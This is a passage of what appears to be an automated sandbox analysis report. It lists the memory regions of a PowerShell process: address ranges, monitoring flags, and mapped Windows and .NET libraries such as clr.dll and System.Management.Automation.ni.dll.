entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10385 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 10386 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10387 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 10388 start_va = 0x1da0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 10392 start_va = 0x420000 end_va = 0x426fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10394 start_va = 0x7ffb187b0000 end_va = 0x7ffb18847fff monitored = 1 entry_point = 0x7ffb187b1000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 10395 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10396 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10397 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 10398 start_va = 0x7ffb09400000 end_va = 0x7ffb09d8dfff monitored = 1 entry_point = 0x7ffb0952d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 10399 start_va = 0x7ffb186b0000 end_va = 0x7ffb187a6fff monitored = 0 entry_point = 0x7ffb186d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 10404 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 10405 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 10406 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 10407 start_va = 0x7ffaa9ca0000 end_va = 0x7ffaa9caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ca0000" filename = "" Region: id = 10408 start_va = 0x7ffaa9cb0000 end_va = 0x7ffaa9cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9cb0000" filename = "" Region: id = 10409 start_va = 0x7ffaa9cc0000 end_va = 0x7ffaa9d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9cc0000" filename = "" Region: id = 10410 start_va = 0x7ffaa9d50000 end_va = 0x7ffaa9dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9d50000" filename = "" Region: id = 10411 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10412 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10413 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 10414 start_va = 0x1da0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 10415 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 10416 start_va = 0x1da0000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 10417 start_va = 0x1eb0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 10418 start_va = 0x1da0000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 10419 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 10420 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 10421 start_va = 0x1f60000 end_va = 0x19f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 10422 start_va = 0x600000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 10423 start_va = 0x19f60000 end_va = 0x1a061fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000019f60000" filename = "" Region: id = 10428 start_va = 0x1ec0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 10437 start_va = 0x1a070000 end_va = 0x1a3a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10438 start_va = 0x7ffb07f30000 end_va = 0x7ffb093f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Region: id = 10439 start_va = 0x7df5ffe20000 end_va = 0x7df5ffebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe20000" filename = "" Region: id = 10440 start_va = 0x7df5ffe10000 end_va = 0x7df5ffe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe10000" filename = "" Region: id = 10441 start_va = 0x1e20000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 10442 start_va = 0x1a3b0000 end_va = 0x1a48cfff monitored = 0 entry_point = 0x1a40e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 10443 start_va = 0x1a3b0000 end_va = 0x1a48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a3b0000" filename = "" Region: id = 10444 start_va = 0x1e30000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 10453 start_va = 0x7ffb07310000 end_va = 0x7ffb07f23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll") Region: id = 10458 start_va = 0x7ffb06980000 end_va = 0x7ffb07300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll") Region: id = 10459 start_va = 0x7ffb18160000 end_va = 0x7ffb1820bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\microsoft.powershell.consolehost.ni.dll") Region: id = 10460 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 10461 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 10462 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 10463 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 10468 start_va = 0x7ffaa9dc0000 end_va = 0x7ffaa9dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9dc0000" filename = "" Region: id = 10469 start_va = 0x7ffaa9e00000 end_va = 0x7ffaa9e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e00000" filename = "" Region: id = 10478 start_va = 0x7ffb04970000 end_va = 0x7ffb06978fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\system.management.automation.ni.dll") Region: id = 10507 start_va = 0x1a3b0000 end_va = 0x1a411fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 10508 start_va = 0x1a480000 end_va = 0x1a48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a480000" filename = "" Region: id = 10513 start_va = 0x1e40000 end_va = 0x1e44fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 10514 start_va = 0x1e50000 end_va = 0x1e5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 10515 start_va = 0x7ffb28a30000 end_va = 0x7ffb28a37fff monitored = 0 entry_point = 0x7ffb28a310b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 10524 start_va = 0x7ffaa9e10000 end_va = 0x7ffaa9e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e10000" filename = "" Region: id = 10533 start_va = 0x7ffb1c890000 end_va = 0x7ffb1c8dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\system.numerics.ni.dll") Region: id = 10538 start_va = 0x7ffb18610000 end_va = 0x7ffb186abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\953b834c8f9245b900628eed76db0400\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\953b834c8f9245b900628eed76db0400\\microsoft.management.infrastructure.ni.dll") Region: id = 10542 start_va = 0x7ffb040d0000 end_va = 0x7ffb04969fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll") Region: id = 10544 start_va = 0x7ffb0e330000 end_va = 0x7ffb0e491fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\system.directoryservices.ni.dll") Region: id = 10545 start_va = 0x7ffb0e1d0000 end_va = 0x7ffb0e32efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\fccecea4442e013d0d6a41b1bb69289b\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\fccecea4442e013d0d6a41b1bb69289b\\system.management.ni.dll") Region: id = 10554 start_va = 0x7ffaa9e20000 end_va = 0x7ffaa9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e20000" filename = "" Region: id = 10559 start_va = 0x7ffaa9e30000 end_va = 0x7ffaa9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e30000" filename = "" Region: id = 10564 start_va = 0x7ffaa9e40000 end_va = 0x7ffaa9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e40000" filename = "" Region: id = 10570 start_va = 0x7ffaa9e50000 end_va = 0x7ffaa9e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e50000" filename = "" Region: id = 10574 start_va = 0x7ffaa9e60000 end_va = 0x7ffaa9e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e60000" filename = "" Region: id = 10583 start_va = 0x7ffaa9e70000 end_va = 0x7ffaa9e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e70000" filename = "" Region: id = 10585 start_va = 0x7ffaa9e80000 end_va = 0x7ffaa9e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e80000" filename = "" Region: id = 10589 start_va = 0x7ffaa9e90000 end_va = 0x7ffaa9e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e90000" filename = "" Region: id = 10597 start_va = 0x7ffaa9ea0000 end_va = 0x7ffaa9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ea0000" filename = "" Region: id = 10599 start_va = 0x7ffaa9eb0000 end_va = 0x7ffaa9ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9eb0000" filename = "" Region: id = 10608 start_va = 0x7ffaa9ec0000 end_va = 0x7ffaa9ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ec0000" filename = "" Region: id = 10609 start_va = 0x7ffaa9ed0000 end_va = 0x7ffaa9edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ed0000" filename = "" Region: id = 10614 start_va = 0x7ffaa9ee0000 end_va = 0x7ffaa9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ee0000" filename = "" Region: id = 10627 start_va = 0x7ffb1e090000 end_va = 0x7ffb1e0bbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\system.configuration.install.ni.dll") Region: id = 10632 start_va = 0x7ffb0e0f0000 end_va = 0x7ffb0e1c6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\aa72dbe028c273873c1324bb840af088\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\aa72dbe028c273873c1324bb840af088\\system.transactions.ni.dll") Region: id = 10633 start_va = 0x7ffb182c0000 end_va = 0x7ffb1830cfff monitored = 1 entry_point = 0x7ffb182dfe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 10634 start_va = 0x1a420000 end_va = 0x1a46afff monitored = 1 entry_point = 0x1a43fe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 10655 start_va = 0x7ffb1cb90000 end_va = 0x7ffb1cb94fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\system.diagnostics.tracing.ni.dll") Region: id = 10660 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10661 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 10662 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10663 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10664 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10665 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10666 start_va = 0x1e60000 end_va = 0x1e60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 10667 start_va = 0x1e70000 end_va = 0x1e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 10668 start_va = 0x1e70000 end_va = 0x1e78fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 10669 start_va = 0x1e70000 end_va = 0x1e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 10670 start_va = 0x1e70000 end_va = 0x1e78fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 10671 start_va = 0x1e70000 end_va = 0x1e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 10672 start_va = 0x1e70000 end_va = 0x1e78fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 10681 start_va = 0x1a490000 end_va = 0x1a50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a490000" filename = "" Region: id = 10682 start_va = 0x1a510000 end_va = 0x1a58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a510000" filename = "" Region: id = 10691 start_va = 0x7ffaa9ef0000 end_va = 0x7ffaa9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ef0000" filename = "" Region: id = 10695 start_va = 0x7ffaa9f00000 end_va = 0x7ffaa9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f00000" filename = "" Region: id = 10697 start_va = 0x7ffb0e640000 end_va = 0x7ffb0e744fff monitored = 1 entry_point = 0x7ffb0e64107c region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 10698 start_va = 0x1e70000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 10723 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10724 start_va = 0x7ffaa9f10000 end_va = 0x7ffaa9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f10000" filename = "" Region: id = 10726 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10823 start_va = 0x1a590000 end_va = 0x1a68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a590000" filename = "" Region: id = 10824 start_va = 0x7ffb0e5d0000 end_va = 0x7ffb0e631fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\microsoft.powershell.security.ni.dll") Region: id = 10926 start_va = 0x7ffaa9f20000 end_va = 0x7ffaa9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f20000" filename = "" Region: id = 10965 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 10966 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 11007 start_va = 0x1a690000 end_va = 0x1a78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a690000" filename = "" Region: id = 11048 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11049 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11130 start_va = 0x7ffaa9f30000 end_va = 0x7ffaa9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f30000" filename = "" Region: id = 11253 start_va = 0x7ffaa9f40000 end_va = 0x7ffaa9f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f40000" filename = "" Region: id = 11254 start_va = 0x7ffaa9f50000 end_va = 0x7ffaa9f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f50000" filename = "" Region: id = 11324 start_va = 0x7ffb0dfd0000 end_va = 0x7ffb0e0effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll") Region: id = 11415 start_va = 0x7ffb1b040000 end_va = 0x7ffb1b04bfff monitored = 0 entry_point = 0x7ffb1b0418b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 11416 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 11417 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 11418 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 11438 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11439 start_va = 0x1a790000 end_va = 0x1a80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a790000" filename = "" Region: id = 11448 start_va = 0x1a420000 end_va = 0x1a430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a420000" filename = "" Region: id = 11477 start_va = 0x1ea0000 end_va = 0x1ea3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 11501 start_va = 0x1a810000 end_va = 0x1a88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a810000" filename = "" Region: id = 11540 start_va = 0x1a890000 end_va = 0x1aa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a890000" filename = "" Region: id = 11600 start_va = 0x7ffb24120000 end_va = 